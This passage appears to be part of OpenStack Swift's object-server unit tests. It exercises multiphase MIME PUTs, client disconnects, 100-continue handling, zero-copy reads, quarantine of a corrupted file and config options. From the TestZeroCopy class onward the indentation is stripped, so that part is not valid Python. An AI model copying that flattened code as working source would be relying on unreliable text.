                req = Request.blank(
                    '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                    headers={'X-Timestamp': put_timestamp,
                             'Content-Length': '9',
                             'Content-Type': 'application/octet-stream'})
                req.body = 'some data'
                resp = req.get_response(self.object_controller)
                self.assertEqual(resp.status_int, 201)
            return listing
        with mock.patch('os.listdir', mock_listdir):
            req = Request.blank(
                '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
                headers={'X-Timestamp': delete_timestamp})
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 404)
        qdir = os.path.join(self.testdir, 'sda1', 'quarantined')
        self.assertFalse(os.path.exists(qdir))
        # the racing PUT's data survives
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'HEAD'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(resp.headers['X-Timestamp'], put_timestamp)
    def test_multiphase_put_draining(self):
        """The server drains unrecognized extra MIME documents after the
        object body/footers, and only reads the input inside a
        ChunkReadTimeout context."""
        # We want to ensure that we read the whole response body even if
        # it's multipart MIME and there's document parts that we don't
        # expect or understand. This'll help save our bacon if we ever jam
        # more stuff in there.
        in_a_timeout = [False]
        # inherit from BaseException so we get a stack trace when the test
        # fails instead of just a 500
        class NotInATimeout(BaseException):
            pass
        class FakeTimeout(BaseException):
            # stand-in for ChunkReadTimeout; flips the closure flag so
            # PickyWsgiBytesIO can tell whether a read is guarded
            def __enter__(self):
                in_a_timeout[0] = True
            def __exit__(self, typ, value, tb):
                in_a_timeout[0] = False
        class PickyWsgiBytesIO(WsgiBytesIO):
            # refuses any read that happens outside the timeout context
            def read(self, *a, **kw):
                if not in_a_timeout[0]:
                    raise NotInATimeout()
                return WsgiBytesIO.read(self, *a, **kw)
            def readline(self, *a, **kw):
                if not in_a_timeout[0]:
                    raise NotInATimeout()
                return WsgiBytesIO.readline(self, *a, **kw)
        test_data = 'obj data'
        footer_meta = {
            "X-Object-Sysmeta-Ec-Frag-Index": "7",
            "Etag": md5(test_data).hexdigest(),
        }
        footer_json = json.dumps(footer_meta)
        footer_meta_cksum = md5(footer_json).hexdigest()
        test_doc = "\r\n".join((
            "--boundary123",
            "X-Document: object body",
            "",
            test_data,
            "--boundary123",
            "X-Document: object metadata",
            "Content-MD5: " + footer_meta_cksum,
            "",
            footer_json,
            "--boundary123",
            "X-Document: we got cleverer",
            "",
            "stuff stuff meaningless stuuuuuuuuuuff",
            "--boundary123",
            "X-Document: we got even cleverer; can you believe it?",
            "Waneshaft: ambifacient lunar",
            "Casing: malleable logarithmic",
            "",
            "potato potato potato potato potato potato potato",
            "--boundary123--"
        ))
        if six.PY3:
            test_doc = test_doc.encode('utf-8')
        # phase1 - PUT request with object metadata in footer and
        # multiphase commit conversation
        put_timestamp = utils.Timestamp(time()).internal
        headers = {
            'Content-Type': 'text/plain',
            'X-Timestamp': put_timestamp,
            'Transfer-Encoding': 'chunked',
            'Expect': '100-continue',
            'X-Backend-Storage-Policy-Index': '1',
            'X-Backend-Obj-Content-Length': len(test_data),
            'X-Backend-Obj-Metadata-Footer': 'yes',
            'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary123',
        }
        wsgi_input = PickyWsgiBytesIO(test_doc)
        req = Request.blank(
            "/sda1/0/a/c/o",
            environ={'REQUEST_METHOD': 'PUT', 'wsgi.input': wsgi_input},
            headers=headers)
        app = object_server.ObjectController(self.conf, logger=self.logger)
        with mock.patch('swift.obj.server.ChunkReadTimeout', FakeTimeout):
            resp = req.get_response(app)
        self.assertEqual(resp.status_int, 201)  # sanity check
        in_a_timeout[0] = True  # so we can check without an exception
        self.assertEqual(wsgi_input.read(), '')  # we read all the bytes
@patch_policies(test_policies)
class TestObjectServer(unittest.TestCase):
    """End-to-end object-server tests over a real listening WSGI socket.

    These tests speak raw HTTP (via bufferedhttp) so they can exercise
    Expect: 100-continue handling and the multiphase MIME PUT protocol
    used by EC policies.
    """
    def setUp(self):
        """Create a temp device tree and start the object server on an
        ephemeral port."""
        # dirs
        self.tmpdir = tempfile.mkdtemp()
        self.tempdir = os.path.join(self.tmpdir, 'tmp_test_obj_server')
        self.devices = os.path.join(self.tempdir, 'srv/node')
        for device in ('sda1', 'sdb1'):
            os.makedirs(os.path.join(self.devices, device))
        self.conf = {
            'devices': self.devices,
            'swift_dir': self.tempdir,
            'mount_check': 'false',
        }
        self.logger = debug_logger('test-object-server')
        self.app = object_server.ObjectController(
            self.conf, logger=self.logger)
        sock = listen_zero()
        self.server = spawn(wsgi.server, sock, self.app, utils.NullLogger())
        self.port = sock.getsockname()[1]
    def tearDown(self):
        """Remove the temp device tree."""
        rmtree(self.tmpdir)
    def test_not_found(self):
        """GET of a nonexistent object returns 404."""
        conn = bufferedhttp.http_connect('127.0.0.1', self.port, 'sda1', '0',
                                         'GET', '/a/c/o')
        resp = conn.getresponse()
        self.assertEqual(resp.status, 404)
        resp.read()
        resp.close()
    def test_expect_on_put(self):
        """PUT with Expect: 100-continue gets a 100, then a 201 after the
        body is sent."""
        test_body = 'test'
        headers = {
            'Expect': '100-continue',
            'Content-Length': len(test_body),
            'Content-Type': 'application/test',
            'X-Timestamp': utils.Timestamp(time()).internal,
        }
        conn = bufferedhttp.http_connect('127.0.0.1', self.port, 'sda1', '0',
                                         'PUT', '/a/c/o', headers=headers)
        resp = conn.getexpect()
        self.assertEqual(resp.status, 100)
        conn.send(test_body)
        resp = conn.getresponse()
        self.assertEqual(resp.status, 201)
        resp.read()
        resp.close()
    def test_expect_on_put_footer(self):
        """Requesting metadata footers makes the 100-continue response
        advertise X-Obj-Metadata-Footer: yes."""
        test_body = 'test'
        headers = {
            'Expect': '100-continue',
            'Content-Length': len(test_body),
            'Content-Type': 'application/test',
            'X-Timestamp': utils.Timestamp(time()).internal,
            'X-Backend-Obj-Metadata-Footer': 'yes',
            'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary123',
        }
        conn = bufferedhttp.http_connect('127.0.0.1', self.port, 'sda1', '0',
                                         'PUT', '/a/c/o', headers=headers)
        resp = conn.getexpect()
        self.assertEqual(resp.status, 100)
        headers = HeaderKeyDict(resp.getheaders())
        self.assertEqual(headers['X-Obj-Metadata-Footer'], 'yes')
        resp.close()
    def test_expect_on_put_conflict(self):
        """A second PUT with the same timestamp is refused at the expect
        stage with 409 and X-Backend-Timestamp of the existing data."""
        test_body = 'test'
        put_timestamp = utils.Timestamp(time())
        headers = {
            'Expect': '100-continue',
            'Content-Length': len(test_body),
            'Content-Type': 'application/test',
            'X-Timestamp': put_timestamp.internal,
        }
        conn = bufferedhttp.http_connect('127.0.0.1', self.port, 'sda1', '0',
                                         'PUT', '/a/c/o', headers=headers)
        resp = conn.getexpect()
        self.assertEqual(resp.status, 100)
        conn.send(test_body)
        resp = conn.getresponse()
        self.assertEqual(resp.status, 201)
        resp.read()
        resp.close()
        # and again with same timestamp
        conn = bufferedhttp.http_connect('127.0.0.1', self.port, 'sda1', '0',
                                         'PUT', '/a/c/o', headers=headers)
        resp = conn.getexpect()
        self.assertEqual(resp.status, 409)
        headers = HeaderKeyDict(resp.getheaders())
        self.assertEqual(headers['X-Backend-Timestamp'], put_timestamp)
        resp.read()
        resp.close()
    def test_multiphase_put_no_mime_boundary(self):
        """Multiphase commit without a MIME boundary header is a 400 at the
        expect stage."""
        test_data = 'obj data'
        put_timestamp = utils.Timestamp(time()).internal
        headers = {
            'Content-Type': 'text/plain',
            'X-Timestamp': put_timestamp,
            'Transfer-Encoding': 'chunked',
            'Expect': '100-continue',
            'X-Backend-Obj-Content-Length': len(test_data),
            'X-Backend-Obj-Multiphase-Commit': 'yes',
        }
        conn = bufferedhttp.http_connect('127.0.0.1', self.port, 'sda1', '0',
                                         'PUT', '/a/c/o', headers=headers)
        resp = conn.getexpect()
        self.assertEqual(resp.status, 400)
        resp.read()
        resp.close()
    def test_expect_on_multiphase_put_diconnect(self):
        """Client disconnect right after the first MIME boundary is logged
        as a 499, not an error."""
        put_timestamp = utils.Timestamp(time()).internal
        headers = {
            'Content-Type': 'text/plain',
            'X-Timestamp': put_timestamp,
            'Transfer-Encoding': 'chunked',
            'Expect': '100-continue',
            'X-Backend-Obj-Content-Length': 0,
            'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary123',
            'X-Backend-Obj-Multiphase-Commit': 'yes',
        }
        conn = bufferedhttp.http_connect('127.0.0.1', self.port, 'sda1', '0',
                                         'PUT', '/a/c/o', headers=headers)
        resp = conn.getexpect()
        self.assertEqual(resp.status, 100)
        headers = HeaderKeyDict(resp.getheaders())
        self.assertEqual(headers['X-Obj-Multiphase-Commit'], 'yes')
        conn.send('c\r\n--boundary123\r\n')
        # disconnect client
        conn.sock.fd._sock.close()
        # yield to the server greenlet so it notices the disconnect
        for i in range(2):
            sleep(0)
        self.assertFalse(self.logger.get_lines_for_level('error'))
        for line in self.logger.get_lines_for_level('info'):
            self.assertIn(' 499 ', line)
    def find_files(self):
        """Walk the device tree and return {extension: [paths]}, ignoring
        lock/bookkeeping files."""
        ignore_files = {'.lock', 'hashes.invalid'}
        found_files = defaultdict(list)
        for root, dirs, files in os.walk(self.devices):
            for filename in files:
                if filename in ignore_files:
                    continue
                _name, ext = os.path.splitext(filename)
                file_path = os.path.join(root, filename)
                found_files[ext].append(file_path)
        return found_files
    @contextmanager
    def _check_multiphase_put_commit_handling(self,
                                              test_doc=None,
                                              headers=None,
                                              finish_body=True):
        """
        This helper will setup a multiphase chunked PUT request and yield at
        the context at the commit phase (after getting the second expect-100
        continue response.
        It can setup a reasonable stub request, but you can over-ride some
        characteristics of the request via kwargs.
        :param test_doc: first part of the mime conversation before the object
                         server will send the 100-continue, this includes the
                         object body
        :param headers: headers to send along with the initial request; some
                        object-metadata (e.g. X-Backend-Obj-Content-Length)
                        is generally expected to match the test_doc)
        :param finish_body: boolean, if true send "0\r\n\r\n" after test_doc
                            and wait for 100-continue before yielding context
        """
        test_data = encode_frag_archive_bodies(POLICIES[1], 'obj data')[0]
        footer_meta = {
            "X-Object-Sysmeta-Ec-Frag-Index": "2",
            "Etag": md5(test_data).hexdigest(),
        }
        footer_json = json.dumps(footer_meta)
        footer_meta_cksum = md5(footer_json).hexdigest()
        test_doc = test_doc or "\r\n".join((
            "--boundary123",
            "X-Document: object body",
            "",
            test_data,
            "--boundary123",
            "X-Document: object metadata",
            "Content-MD5: " + footer_meta_cksum,
            "",
            footer_json,
            "--boundary123",
        ))
        # phase1 - PUT request with object metadata in footer and
        # multiphase commit conversation
        headers = headers or {
            'Content-Type': 'text/plain',
            'Transfer-Encoding': 'chunked',
            'Expect': '100-continue',
            'X-Backend-Storage-Policy-Index': '1',
            'X-Backend-Obj-Content-Length': len(test_data),
            'X-Backend-Obj-Metadata-Footer': 'yes',
            'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary123',
            'X-Backend-Obj-Multiphase-Commit': 'yes',
        }
        put_timestamp = utils.Timestamp(headers.setdefault(
            'X-Timestamp', utils.Timestamp(time()).internal))
        container_update = \
            'swift.obj.server.ObjectController.container_update'
        with mock.patch(container_update) as _container_update:
            conn = bufferedhttp.http_connect(
                '127.0.0.1', self.port, 'sda1', '0',
                'PUT', '/a/c/o', headers=headers)
            resp = conn.getexpect()
            self.assertEqual(resp.status, 100)
            expect_headers = HeaderKeyDict(resp.getheaders())
            to_send = "%x\r\n%s\r\n" % (len(test_doc), test_doc)
            conn.send(to_send)
            if finish_body:
                conn.send("0\r\n\r\n")
                # verify 100-continue response to mark end of phase1
                resp = conn.getexpect()
                self.assertEqual(resp.status, 100)
            # yield relevant context for test
            yield {
                'conn': conn,
                'expect_headers': expect_headers,
                'put_timestamp': put_timestamp,
                'mock_container_update': _container_update,
            }
        # give the object server a little time to trampoline enough to
        # recognize request has finished, or socket has closed or whatever
        sleep(0.1)
    def test_multiphase_put_client_disconnect_right_before_commit(self):
        """Disconnect before sending the commit document: data file stays
        non-durable and no container update happens."""
        with self._check_multiphase_put_commit_handling() as context:
            conn = context['conn']
            # just bail straight out
            conn.sock.fd._sock.close()
        put_timestamp = context['put_timestamp']
        _container_update = context['mock_container_update']
        # and make sure it demonstrates the client disconnect
        log_lines = self.logger.get_lines_for_level('info')
        self.assertEqual(len(log_lines), 1)
        self.assertIn(' 499 ', log_lines[0])
        # verify successful object data file write
        found_files = self.find_files()
        # non durable .data file is there
        self.assertEqual(len(found_files['.data']), 1)
        obj_datafile = found_files['.data'][0]
        self.assertEqual("%s#2.data" % put_timestamp.internal,
                         os.path.basename(obj_datafile))
        # but no other files
        self.assertFalse(found_files['.data'][1:])
        found_files.pop('.data')
        self.assertFalse(found_files)
        # And no container update
        self.assertFalse(_container_update.called)
    def test_multiphase_put_client_disconnect_in_the_middle_of_commit(self):
        """Disconnect mid-commit-document: same outcome as bailing before
        the commit — non-durable data, no container update."""
        with self._check_multiphase_put_commit_handling() as context:
            conn = context['conn']
            # start commit confirmation to start phase2
            commit_confirmation_doc = "\r\n".join((
                "X-Document: put commit",
                "",
                "commit_confirmation",
                "--boundary123--",
            ))
            # but don't send quite all of the commit body
            to_send = "%x\r\n%s" % \
                (len(commit_confirmation_doc), commit_confirmation_doc[:-1])
            conn.send(to_send)
            # and then bail out
            conn.sock.fd._sock.close()
        put_timestamp = context['put_timestamp']
        _container_update = context['mock_container_update']
        # and make sure it demonstrates the client disconnect
        log_lines = self.logger.get_lines_for_level('info')
        self.assertEqual(len(log_lines), 1)
        self.assertIn(' 499 ', log_lines[0])
        # verify successful object data file write
        found_files = self.find_files()
        # non durable .data file is there
        self.assertEqual(len(found_files['.data']), 1)
        obj_datafile = found_files['.data'][0]
        self.assertEqual("%s#2.data" % put_timestamp.internal,
                         os.path.basename(obj_datafile))
        # but no other files
        self.assertFalse(found_files['.data'][1:])
        found_files.pop('.data')
        self.assertFalse(found_files)
        # And no container update
        self.assertFalse(_container_update.called)
    def test_multiphase_put_no_metadata_replicated(self):
        """Replicated-style multiphase PUT (no footers): commit produces a
        plain .data file and triggers the container update."""
        test_data = 'obj data'
        test_doc = "\r\n".join((
            "--boundary123",
            "X-Document: object body",
            "",
            test_data,
            "--boundary123",
        ))
        put_timestamp = utils.Timestamp(time()).internal
        headers = {
            'Content-Type': 'text/plain',
            'X-Timestamp': put_timestamp,
            'Transfer-Encoding': 'chunked',
            'Expect': '100-continue',
            'X-Backend-Obj-Content-Length': len(test_data),
            'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary123',
            'X-Backend-Obj-Multiphase-Commit': 'yes',
        }
        with self._check_multiphase_put_commit_handling(
                test_doc=test_doc, headers=headers) as context:
            expect_headers = context['expect_headers']
            self.assertEqual(expect_headers['X-Obj-Multiphase-Commit'], 'yes')
            # N.B. no X-Obj-Metadata-Footer header
            self.assertNotIn('X-Obj-Metadata-Footer', expect_headers)
            conn = context['conn']
            # send commit confirmation to start phase2
            commit_confirmation_doc = "\r\n".join((
                "X-Document: put commit",
                "",
                "commit_confirmation",
                "--boundary123--",
            ))
            to_send = "%x\r\n%s\r\n0\r\n\r\n" % \
                (len(commit_confirmation_doc), commit_confirmation_doc)
            conn.send(to_send)
            # verify success (2xx) to mark end of phase2
            resp = conn.getresponse()
            self.assertEqual(resp.status, 201)
            resp.read()
            resp.close()
        # verify successful object data file write
        put_timestamp = context['put_timestamp']
        found_files = self.find_files()
        # .data file is there
        self.assertEqual(len(found_files['.data']), 1)
        obj_datafile = found_files['.data'][0]
        self.assertEqual("%s.data" % put_timestamp.internal,
                         os.path.basename(obj_datafile))
        # but no other files
        self.assertFalse(found_files['.data'][1:])
        found_files.pop('.data')
        self.assertFalse(found_files)
        # And container update was called
        self.assertTrue(context['mock_container_update'].called)
    def test_multiphase_put_metadata_footer(self):
        """EC multiphase PUT with footers: commit produces a durable
        #frag#d.data file and triggers the container update."""
        with self._check_multiphase_put_commit_handling() as context:
            expect_headers = context['expect_headers']
            self.assertEqual(expect_headers['X-Obj-Multiphase-Commit'], 'yes')
            self.assertEqual(expect_headers['X-Obj-Metadata-Footer'], 'yes')
            conn = context['conn']
            # send commit confirmation to start phase2
            commit_confirmation_doc = "\r\n".join((
                "X-Document: put commit",
                "",
                "commit_confirmation",
                "--boundary123--",
            ))
            to_send = "%x\r\n%s\r\n0\r\n\r\n" % \
                (len(commit_confirmation_doc), commit_confirmation_doc)
            conn.send(to_send)
            # verify success (2xx) to mark end of phase2
            resp = conn.getresponse()
            self.assertEqual(resp.status, 201)
            resp.read()
            resp.close()
        # verify successful object data and durable state file write
        put_timestamp = context['put_timestamp']
        found_files = self.find_files()
        # .data file is there
        self.assertEqual(len(found_files['.data']), 1)
        obj_datafile = found_files['.data'][0]
        self.assertEqual("%s#2#d.data" % put_timestamp.internal,
                         os.path.basename(obj_datafile))
        # but no other files
        self.assertFalse(found_files['.data'][1:])
        found_files.pop('.data')
        self.assertFalse(found_files)
        # And container update was called
        self.assertTrue(context['mock_container_update'].called)
    def test_multiphase_put_metadata_footer_disconnect(self):
        """Disconnect in the middle of the footer document: nothing is left
        on disk and no container update happens."""
        test_data = 'obj data'
        test_doc = "\r\n".join((
            "--boundary123",
            "X-Document: object body",
            "",
            test_data,
            "--boundary123",
        ))
        # eventlet.wsgi won't return < network_chunk_size from a chunked read
        self.app.network_chunk_size = 16
        with self._check_multiphase_put_commit_handling(
                test_doc=test_doc, finish_body=False) as context:
            conn = context['conn']
            # make footer doc
            footer_meta = {
                "X-Object-Sysmeta-Ec-Frag-Index": "2",
                "Etag": md5(test_data).hexdigest(),
            }
            footer_json = json.dumps(footer_meta)
            footer_meta_cksum = md5(footer_json).hexdigest()
            # send most of the footer doc
            footer_doc = "\r\n".join((
                "X-Document: object metadata",
                "Content-MD5: " + footer_meta_cksum,
                "",
                footer_json,
            ))
            # but don't send final boundary nor last chunk
            to_send = "%x\r\n%s\r\n" % \
                (len(footer_doc), footer_doc)
            conn.send(to_send)
            # and then bail out
            conn.sock.fd._sock.close()
        # and make sure it demonstrates the client disconnect
        log_lines = self.logger.get_lines_for_level('info')
        self.assertEqual(len(log_lines), 1)
        self.assertIn(' 499 ', log_lines[0])
        # no artifacts left on disk
        found_files = self.find_files()
        self.assertFalse(found_files)
        # ... and no container update
        _container_update = context['mock_container_update']
        self.assertFalse(_container_update.called)
    def test_multiphase_put_ec_fragment_in_headers_no_footers(self):
        """The EC frag index may be sent as a request header instead of in
        a MIME footer; the durable data file is still written."""
        test_data = 'obj data'
        test_doc = "\r\n".join((
            "--boundary123",
            "X-Document: object body",
            "",
            test_data,
            "--boundary123",
        ))
        # phase1 - PUT request with multiphase commit conversation
        # no object metadata in footer
        put_timestamp = utils.Timestamp(time()).internal
        headers = {
            'Content-Type': 'text/plain',
            'X-Timestamp': put_timestamp,
            'Transfer-Encoding': 'chunked',
            'Expect': '100-continue',
            # normally the frag index gets sent in the MIME footer (which this
            # test doesn't have, see `test_multiphase_put_metadata_footer`),
            # but the proxy *could* send the frag index in the headers and
            # this test verifies that would work.
            'X-Object-Sysmeta-Ec-Frag-Index': '2',
            'X-Backend-Storage-Policy-Index': '1',
            'X-Backend-Obj-Content-Length': len(test_data),
            'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary123',
            'X-Backend-Obj-Multiphase-Commit': 'yes',
        }
        with self._check_multiphase_put_commit_handling(
                test_doc=test_doc, headers=headers) as context:
            expect_headers = context['expect_headers']
            self.assertEqual(expect_headers['X-Obj-Multiphase-Commit'], 'yes')
            # N.B. no X-Obj-Metadata-Footer header
            self.assertNotIn('X-Obj-Metadata-Footer', expect_headers)
            conn = context['conn']
            # send commit confirmation to start phase2
            commit_confirmation_doc = "\r\n".join((
                "X-Document: put commit",
                "",
                "commit_confirmation",
                "--boundary123--",
            ))
            to_send = "%x\r\n%s\r\n0\r\n\r\n" % \
                (len(commit_confirmation_doc), commit_confirmation_doc)
            conn.send(to_send)
            # verify success (2xx) to mark end of phase2
            resp = conn.getresponse()
            self.assertEqual(resp.status, 201)
            resp.read()
            resp.close()
        # verify successful object data and durable state file write
        put_timestamp = context['put_timestamp']
        found_files = self.find_files()
        # .data file is there
        self.assertEqual(len(found_files['.data']), 1)
        obj_datafile = found_files['.data'][0]
        self.assertEqual("%s#2#d.data" % put_timestamp.internal,
                         os.path.basename(obj_datafile))
        # but no other files
        self.assertFalse(found_files['.data'][1:])
        found_files.pop('.data')
        self.assertFalse(found_files)
        # And container update was called
        self.assertTrue(context['mock_container_update'].called)
    def test_multiphase_put_bad_commit_message(self):
        """A malformed commit document is a 500; the data file stays
        non-durable and no container update happens."""
        with self._check_multiphase_put_commit_handling() as context:
            conn = context['conn']
            # send commit confirmation to start phase2
            commit_confirmation_doc = "\r\n".join((
                "junkjunk",
                "--boundary123--",
            ))
            to_send = "%x\r\n%s\r\n0\r\n\r\n" % \
                (len(commit_confirmation_doc), commit_confirmation_doc)
            conn.send(to_send)
            resp = conn.getresponse()
            self.assertEqual(resp.status, 500)
            resp.read()
            resp.close()
        put_timestamp = context['put_timestamp']
        _container_update = context['mock_container_update']
        # verify that durable data file was NOT created
        found_files = self.find_files()
        # non durable .data file is there
        self.assertEqual(len(found_files['.data']), 1)
        obj_datafile = found_files['.data'][0]
        self.assertEqual("%s#2.data" % put_timestamp.internal,
                         os.path.basename(obj_datafile))
        # but no other files
        self.assertFalse(found_files['.data'][1:])
        found_files.pop('.data')
        self.assertFalse(found_files)
        # And no container update
        self.assertFalse(_container_update.called)
    def test_multiphase_put_drains_extra_commit_junk(self):
        """Unknown MIME documents after the commit confirmation are drained
        so the connection stays usable for the next request."""
        with self._check_multiphase_put_commit_handling() as context:
            conn = context['conn']
            # send commit confirmation to start phase2
            commit_confirmation_doc = "\r\n".join((
                "X-Document: put commit",
                "",
                "commit_confirmation",
                "--boundary123",
                "X-Document: we got cleverer",
                "",
                "stuff stuff meaningless stuuuuuuuuuuff",
                "--boundary123",
                "X-Document: we got even cleverer; can you believe it?",
                "Waneshaft: ambifacient lunar",
                "Casing: malleable logarithmic",
                "",
                "potato potato potato potato potato potato potato",
                "--boundary123--",
            ))
            to_send = "%x\r\n%s\r\n0\r\n\r\n" % \
                (len(commit_confirmation_doc), commit_confirmation_doc)
            conn.send(to_send)
            # verify success (2xx) to mark end of phase2
            resp = conn.getresponse()
            self.assertEqual(resp.status, 201)
            resp.read()
            # make another request to validate the HTTP protocol state
            conn.putrequest('GET', '/sda1/0/a/c/o')
            conn.putheader('X-Backend-Storage-Policy-Index', '1')
            conn.endheaders()
            resp = conn.getresponse()
            self.assertEqual(resp.status, 200)
            resp.read()
            resp.close()
        # verify successful object data and durable state file write
        put_timestamp = context['put_timestamp']
        found_files = self.find_files()
        # .data file is there
        self.assertEqual(len(found_files['.data']), 1)
        obj_datafile = found_files['.data'][0]
        self.assertEqual("%s#2#d.data" % put_timestamp.internal,
                         os.path.basename(obj_datafile))
        # but no other files
        self.assertFalse(found_files['.data'][1:])
        found_files.pop('.data')
        self.assertFalse(found_files)
        # And container update was called
        self.assertTrue(context['mock_container_update'].called)
    def test_multiphase_put_drains_extra_commit_junk_disconnect(self):
        """Disconnect while draining post-commit junk: the commit already
        happened, so the durable data file remains, but the container
        update is skipped."""
        commit_confirmation_doc = "\r\n".join((
            "X-Document: put commit",
            "",
            "commit_confirmation",
            "--boundary123",
            "X-Document: we got cleverer",
            "",
            "stuff stuff meaningless stuuuuuuuuuuff",
            "--boundary123",
            "X-Document: we got even cleverer; can you believe it?",
            "Waneshaft: ambifacient lunar",
            "Casing: malleable logarithmic",
            "",
            "potato potato potato potato potato potato potato",
        ))
        # eventlet.wsgi won't return < network_chunk_size from a chunked read
        self.app.network_chunk_size = 16
        with self._check_multiphase_put_commit_handling() as context:
            conn = context['conn']
            # send commit confirmation and some other stuff
            # but don't send final boundary or last chunk
            to_send = "%x\r\n%s\r\n" % \
                (len(commit_confirmation_doc), commit_confirmation_doc)
            conn.send(to_send)
            # and then bail out
            conn.sock.fd._sock.close()
        # and make sure it demonstrates the client disconnect
        log_lines = self.logger.get_lines_for_level('info')
        self.assertEqual(len(log_lines), 1)
        self.assertIn(' 499 ', log_lines[0])
        # verify successful object data and durable state file write
        put_timestamp = context['put_timestamp']
        found_files = self.find_files()
        # .data file is there
        self.assertEqual(len(found_files['.data']), 1)
        obj_datafile = found_files['.data'][0]
        self.assertEqual("%s#2#d.data" % put_timestamp.internal,
                         os.path.basename(obj_datafile))
        # but no other files
        self.assertFalse(found_files['.data'][1:])
        found_files.pop('.data')
        self.assertFalse(found_files)
        # but no container update
        self.assertFalse(context['mock_container_update'].called)
@patch_policies
class TestZeroCopy(unittest.TestCase):
"""Test the object server's zero-copy functionality"""
def _system_can_zero_copy(self):
if not splice.available:
return False
try:
utils.get_md5_socket()
except IOError:
return False
return True
def setUp(self):
if not self._system_can_zero_copy():
raise SkipTest("zero-copy support is missing")
self.testdir = mkdtemp(suffix="obj_server_zero_copy")
mkdirs(os.path.join(self.testdir, 'sda1', 'tmp'))
conf = {'devices': self.testdir,
'mount_check': 'false',
'splice': 'yes',
'disk_chunk_size': '4096'}
self.object_controller = object_server.ObjectController(
conf, logger=debug_logger())
self.df_mgr = diskfile.DiskFileManager(
conf, self.object_controller.logger)
listener = listen_zero()
port = listener.getsockname()[1]
self.wsgi_greenlet = spawn(
wsgi.server, listener, self.object_controller, NullLogger())
self.http_conn = httplib.HTTPConnection('127.0.0.1', port)
self.http_conn.connect()
def tearDown(self):
"""Tear down for testing swift.object.server.ObjectController"""
self.wsgi_greenlet.kill()
rmtree(self.testdir)
def test_GET(self):
url_path = '/sda1/2100/a/c/o'
self.http_conn.request('PUT', url_path, 'obj contents',
{'X-Timestamp': '127082564.24709',
'Content-Type': 'application/test'})
response = self.http_conn.getresponse()
self.assertEqual(response.status, 201)
response.read()
self.http_conn.request('GET', url_path)
response = self.http_conn.getresponse()
self.assertEqual(response.status, 200)
contents = response.read()
self.assertEqual(contents, 'obj contents')
def test_GET_big(self):
# Test with a large-ish object to make sure we handle full socket
# buffers correctly.
obj_contents = 'A' * 4 * 1024 * 1024 # 4 MiB
url_path = '/sda1/2100/a/c/o'
self.http_conn.request('PUT', url_path, obj_contents,
{'X-Timestamp': '1402600322.52126',
'Content-Type': 'application/test'})
response = self.http_conn.getresponse()
self.assertEqual(response.status, 201)
response.read()
self.http_conn.request('GET', url_path)
response = self.http_conn.getresponse()
self.assertEqual(response.status, 200)
contents = response.read()
self.assertEqual(contents, obj_contents)
def test_quarantine(self):
obj_hash = hash_path('a', 'c', 'o')
url_path = '/sda1/2100/a/c/o'
ts = '1402601849.47475'
self.http_conn.request('PUT', url_path, 'obj contents',
{'X-Timestamp': ts,
'Content-Type': 'application/test'})
response = self.http_conn.getresponse()
self.assertEqual(response.status, 201)
response.read()
# go goof up the file on disk
fname = os.path.join(self.testdir, 'sda1', 'objects', '2100',
obj_hash[-3:], obj_hash, ts + '.data')
with open(fname, 'rb+') as fh:
fh.write('XYZ')
self.http_conn.request('GET', url_path)
response = self.http_conn.getresponse()
self.assertEqual(response.status, 200)
contents = response.read()
self.assertEqual(contents, 'XYZ contents')
self.http_conn.request('GET', url_path)
response = self.http_conn.getresponse()
# it was quarantined by the previous request
self.assertEqual(response.status, 404)
response.read()
def test_quarantine_on_well_formed_zero_byte_file(self):
# Make sure we work around an oddity in Linux's hash sockets
url_path = '/sda1/2100/a/c/o'
ts = '1402700497.71333'
self.http_conn.request(
'PUT', url_path, '',
{'X-Timestamp': ts, 'Content-Length': '0',
'Content-Type': 'application/test'})
response = self.http_conn.getresponse()
self.assertEqual(response.status, 201)
response.read()
self.http_conn.request('GET', url_path)
response = self.http_conn.getresponse()
self.assertEqual(response.status, 200)
contents = response.read()
self.assertEqual(contents, '')
self.http_conn.request('GET', url_path)
response = self.http_conn.getresponse()
self.assertEqual(response.status, 200) # still there
contents = response.read()
self.assertEqual(contents, '')
class TestConfigOptionHandling(unittest.TestCase):
def setUp(self):
self.tmpdir = mkdtemp()
def tearDown(self):
rmtree(self.tmpdir)
def _app_config(self, config):
contents = dedent(config)
conf_file = os.path.join(self.tmpdir, 'object-server.conf')
with open(conf_file, 'w') as f:
f.write(contents)
return init_request_processor(conf_file, 'object-server')[:2]
def test_default(self):
config = """
[DEFAULT]
[pipeline:main]
pipeline = object-server
[app:object-server]
use = egg:swift#object
"""
app, config = self._app_config(config)
self.assertNotIn('reclaim_age', config)
for policy in POLICIES:
self.assertEqual(app._diskfile_router[policy].reclaim_age, 604800)
def test_option_in_app(self):
config = """
[DEFAULT]
[pipeline:main]
pipeline = object-server
[app:object-server]
use = egg:swift#object
reclaim_age = 100
"""
app, config = self._app_config(config)
self.assertEqual(config['reclaim_age'], '100')
for policy in POLICIES:
self.assertEqual(app._diskfile_router[policy].reclaim_age, 100)
def test_option_in_default(self):
config = """
[DEFAULT]
reclaim_age = 200
[pipeline:main]
pipeline = object-server
[app:object-server]
use = egg:swift#object
"""
app, config = self._app_config(config)
self.assertEqual(config['reclaim_age'], '200')
for policy in POLICIES:
self.assertEqual(app._diskfile_router[policy].reclaim_age, 200)
def test_option_in_both(self):
config = """
[DEFAULT]
reclaim_age = 300
[pipeline:main]
pipeline = object-server
[app:object-server]
use = egg:swift#object
reclaim_age = 400
"""
app, config = self._app_config(config)
self.assertEqual(config['reclaim_age'], '300')
for policy in POLICIES:
self.assertEqual(app._diskfile_router[policy].reclaim_age, 300)
# use paste "set" syntax to override global config value
config = """
[DEFAULT]
reclaim_age = 500
[pipeline:main]
pipeline = object-server
[app:object-server]
use = egg:swift#object
set reclaim_age = 600
"""
app, config = self._app_config(config)
self.assertEqual(config['reclaim_age'], '600')
for policy in POLICIES:
self.assertEqual(app._diskfile_router[policy].reclaim_age, 600)
